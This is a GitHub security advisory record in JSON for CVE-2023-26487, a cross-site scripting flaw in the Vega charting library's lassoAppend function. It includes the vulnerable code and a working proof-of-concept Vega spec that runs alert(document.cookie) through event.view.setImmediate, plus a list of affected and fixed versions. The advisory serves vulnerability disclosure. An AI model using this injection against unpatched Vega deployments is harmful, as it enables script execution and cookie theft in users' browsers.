{
  "schema_version": "1.4.0",
  "id": "GHSA-w5m3-xh75-mp55",
  "modified": "2023-03-13T15:30:47Z",
  "published": "2023-03-02T23:08:21Z",
  "aliases": [
    "CVE-2023-26487"
  ],
  "summary": "Vega has Cross-site Scripting vulnerability in `lassoAppend` function",
  "details": "### Summary\n\nVega's `lassoAppend` function: `lassoAppend` accepts 3 arguments and internally invokes `push` function on the 1st argument specifying array consisting of 2nd and 3rd arguments as `push` call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.\n\nThis makes it possible to specify any object with a `push` function as the 1st argument, `push` function can be set to any function that can be access via `event.view` (no all such functions can be exploited due to invalid context or signature, but some can, e.g. `console.log`).\n\n### Details\nThe issue is that [`lassoAppend`](https://github.com/vega/vega/blob/7eafbbd4d53d0ce9f08e74ff96c90d411b1bb80a/packages/vega-functions/src/functions/lasso.js#L13) doesn't enforce proper types of its arguments:\n```js\n.....\nexport function lassoAppend(lasso, x, y, minDist = 5) {\n    const last = lasso[lasso.length - 1];\n\n    // Add point to lasso if distance to last point exceed minDist or its the first point\n    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {\n        lasso.push([x, y]);\n.....\n```\n\n### PoC\n\nUse the following Vega snippet (depends on browser's non-built-in `event.view.setImmediate` function, feel free to replace with `event.view.console.log` or alike and observe the result in the browser's console)\n\n```json\n{\n  \"$schema\": \"https://vega.github.io/schema/vega/v5.json\",\n  \"width\": 350,\n  \"height\": 350,\n  \"autosize\": \"none\",\n  \"description\": \"Toggle Button\",\n  \"signals\": [\n    {\n      \"name\": \"toggle\",\n      \"value\": false,\n      \"on\": [\n        {\n          \"events\": {\"type\": \"click\", \"markname\": \"circle\"},\n          \"update\": \"toggle ? false : true\"\n        }\n      ]\n    },\n    {\n      \"name\": \"addFilter\",\n      \"on\": [\n        {\n          \"events\": {\"type\": \"mousemove\", \"source\": \"window\"},\n          \"update\": \"lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')\"\n        }\n      ]\n    }\n  ],\n  \"marks\": [\n    {\n      \"name\": \"circle\",\n      \"type\": \"symbol\",\n      \"zindex\": 1,\n      \"encode\": {\n        \"enter\": {\n          \"y\": {\"signal\": \"height/2\"},\n          \"angle\": {\"value\": 0},\n          \"size\": {\"value\": 400},\n          \"shape\": {\"value\": \"circle\"},\n          \"fill\": {\"value\": \"white\"},\n          \"stroke\": {\"value\": \"white\"},\n          \"strokeWidth\": {\"value\": 2},\n          \"cursor\": {\"value\": \"pointer\"},\n          \"tooltip\": {\"signal\": \"{Tip: 'Click to fire XSS'}\"}\n        },\n        \"update\": {\"x\": {\"signal\": \"toggle === true ? 190 : 165\"}}\n      }\n    },\n    {\n      \"name\": \"rectangle\",\n      \"type\": \"rect\",\n      \"zindex\": 0,\n      \"encode\": {\n        \"enter\": {\n          \"x\": {\"value\": 152},\n          \"y\": {\"value\": 162.5},\n          \"width\": {\"value\": 50},\n          \"height\": {\"value\": 25},\n          \"cornerRadius\": {\"value\": 20}\n        },\n        \"update\": {\n          \"fill\": {\"signal\": \"toggle === true ? '#006BB4' : '#939597'\"}\n        }\n      }\n    }\n  ]\n}\n```\n\n### Impact\nThis issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS `setImmediate` polyfill basically allows `eval`-like functionality).\n",
  "severity": [
    {
      "type": "CVSS_V3",
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
    }
  ],
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vega"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.23.0"
            }
          ]
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "vega-functions"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.13.1"
            }
          ]
        }
      ]
    }
  ],
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vega/vega/security/advisories/GHSA-w5m3-xh75-mp55"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26487"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vega/vega/commit/01adb034f24727d3bb321bbbb6696a7f4cd91689"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vega/vega"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vega/vega/releases/tag/v5.23.0"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-02T23:08:21Z",
    "nvd_published_at": "2023-03-04T00:15:00Z"
  }
}